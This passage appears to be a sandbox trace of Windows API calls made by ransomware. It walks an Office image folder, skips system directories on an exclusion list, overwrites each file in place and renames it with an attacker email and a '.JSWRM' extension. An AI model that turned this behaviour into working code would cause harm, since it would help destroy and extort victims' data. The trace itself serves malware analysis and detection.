lpString2="system volume information") returned 1 [0134.082] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0134.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0134.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0134.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.083] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3747) returned 1 [0134.083] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.083] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xea0, lpOverlapped=0x0) returned 1 [0134.085] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.085] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xea0, lpOverlapped=0x0) returned 1 [0134.085] CloseHandle (hObject=0x238) returned 1 [0134.085] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.086] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x836, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.contrast-white_scale-80.png", cAlternateFileName="WI385D~1.PNG")) returned 1 [0134.086] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-80.png", lpString2=".") returned 1 [0134.086] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-80.png", lpString2="..") returned 1 [0134.086] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-80.png", lpString2="...") returned 1 [0134.086] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-80.png", lpString2="windows") returned 1 [0134.086] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-80.png", lpString2="recovery") returned 1 [0134.086] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-80.png", lpString2="perflogs") returned 1 [0134.086] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0134.086] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.086] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-80.png", lpString2="system volume information") returned 1 [0134.086] lstrcmpiW (lpString1="WinProjLogo.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0134.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0134.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0134.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0134.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0134.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.087] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2102) returned 1 [0134.087] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.088] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x830, lpOverlapped=0x0) returned 1 [0134.090] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.090] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x830, lpOverlapped=0x0) returned 1 [0134.090] CloseHandle (hObject=0x238) returned 1 [0134.090] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.091] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x935, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.scale-100.png", cAlternateFileName="WI7FD4~1.PNG")) returned 1 [0134.091] lstrcmpiW (lpString1="WinProjLogo.scale-100.png", lpString2=".") returned 1 [0134.091] lstrcmpiW (lpString1="WinProjLogo.scale-100.png", lpString2="..") returned 1 [0134.091] lstrcmpiW (lpString1="WinProjLogo.scale-100.png", lpString2="...") returned 1 [0134.091] lstrcmpiW (lpString1="WinProjLogo.scale-100.png", lpString2="windows") returned 1 [0134.091] lstrcmpiW (lpString1="WinProjLogo.scale-100.png", lpString2="recovery") returned 1 [0134.091] lstrcmpiW (lpString1="WinProjLogo.scale-100.png", lpString2="perflogs") returned 1 [0134.091] lstrcmpiW (lpString1="WinProjLogo.scale-100.png", lpString2="documents and settings") returned 1 [0134.091] lstrcmpiW (lpString1="WinProjLogo.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0134.091] lstrcmpiW (lpString1="WinProjLogo.scale-100.png", lpString2="system volume information") returned 1 [0134.091] lstrcmpiW (lpString1="WinProjLogo.scale-100.png", lpString2="msocache") returned 1 [0134.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 25 [0134.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-100.png", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 25 [0134.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.092] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2357) returned 1 [0134.092] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.092] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x930, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x930, lpOverlapped=0x0) returned 1 [0134.094] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.094] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x930, lpOverlapped=0x0) returned 1 [0134.094] CloseHandle (hObject=0x238) returned 1 [0134.094] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.095] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc0b, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.scale-140.png", cAlternateFileName="WI3D06~1.PNG")) returned 1 [0134.095] lstrcmpiW (lpString1="WinProjLogo.scale-140.png", lpString2=".") returned 1 [0134.095] lstrcmpiW (lpString1="WinProjLogo.scale-140.png", lpString2="..") returned 1 [0134.095] lstrcmpiW (lpString1="WinProjLogo.scale-140.png", lpString2="...") returned 1 [0134.095] lstrcmpiW (lpString1="WinProjLogo.scale-140.png", lpString2="windows") returned 1 [0134.095] lstrcmpiW (lpString1="WinProjLogo.scale-140.png", lpString2="recovery") returned 1 [0134.095] lstrcmpiW (lpString1="WinProjLogo.scale-140.png", lpString2="perflogs") returned 1 [0134.096] lstrcmpiW (lpString1="WinProjLogo.scale-140.png", lpString2="documents and settings") returned 1 [0134.096] lstrcmpiW (lpString1="WinProjLogo.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.096] lstrcmpiW (lpString1="WinProjLogo.scale-140.png", lpString2="system volume information") returned 1 [0134.096] lstrcmpiW (lpString1="WinProjLogo.scale-140.png", lpString2="msocache") returned 1 [0134.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 25 [0134.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x241100, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 25 [0134.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.097] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3083) returned 1 [0134.097] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.097] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc00, lpOverlapped=0x0) returned 1 [0134.098] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.098] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc00, lpOverlapped=0x0) returned 1 [0134.099] CloseHandle (hObject=0x238) returned 1 [0134.099] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.100] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7bc76a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7bc76a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe3c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.scale-180.png", cAlternateFileName="WI8A9A~1.PNG")) returned 1 [0134.100] lstrcmpiW (lpString1="WinProjLogo.scale-180.png", lpString2=".") returned 1 [0134.100] lstrcmpiW (lpString1="WinProjLogo.scale-180.png", lpString2="..") returned 1 [0134.100] lstrcmpiW (lpString1="WinProjLogo.scale-180.png", lpString2="...") returned 1 [0134.100] lstrcmpiW (lpString1="WinProjLogo.scale-180.png", lpString2="windows") returned 1 [0134.100] lstrcmpiW (lpString1="WinProjLogo.scale-180.png", lpString2="recovery") returned 1 [0134.100] lstrcmpiW (lpString1="WinProjLogo.scale-180.png", lpString2="perflogs") returned 1 [0134.100] lstrcmpiW (lpString1="WinProjLogo.scale-180.png", lpString2="documents and settings") returned 1 [0134.100] lstrcmpiW (lpString1="WinProjLogo.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.100] lstrcmpiW (lpString1="WinProjLogo.scale-180.png", lpString2="system volume information") returned 1 [0134.100] lstrcmpiW (lpString1="WinProjLogo.scale-180.png", lpString2="msocache") returned 1 [0134.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x241178, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 25 [0134.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x240ef8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 25 [0134.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.101] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3644) returned 1 [0134.101] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.101] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe30, lpOverlapped=0x0) returned 1 [0134.103] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.103] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe30, lpOverlapped=0x0) returned 1 [0134.103] CloseHandle (hObject=0x238) returned 1 [0134.103] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogo.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogo.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.104] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x890, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogo.scale-80.png", cAlternateFileName="WI01D8~1.PNG")) returned 1 [0134.104] lstrcmpiW (lpString1="WinProjLogo.scale-80.png", lpString2=".") returned 1 [0134.104] lstrcmpiW (lpString1="WinProjLogo.scale-80.png", lpString2="..") returned 1 [0134.104] lstrcmpiW (lpString1="WinProjLogo.scale-80.png", lpString2="...") returned 1 [0134.104] lstrcmpiW (lpString1="WinProjLogo.scale-80.png", lpString2="windows") returned 1 [0134.104] lstrcmpiW (lpString1="WinProjLogo.scale-80.png", lpString2="recovery") returned 1 [0134.105] lstrcmpiW (lpString1="WinProjLogo.scale-80.png", lpString2="perflogs") returned 1 [0134.105] lstrcmpiW (lpString1="WinProjLogo.scale-80.png", lpString2="documents and settings") returned 1 [0134.105] lstrcmpiW (lpString1="WinProjLogo.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.105] lstrcmpiW (lpString1="WinProjLogo.scale-80.png", lpString2="system volume information") returned 1 [0134.105] lstrcmpiW (lpString1="WinProjLogo.scale-80.png", lpString2="msocache") returned 1 [0134.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0134.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 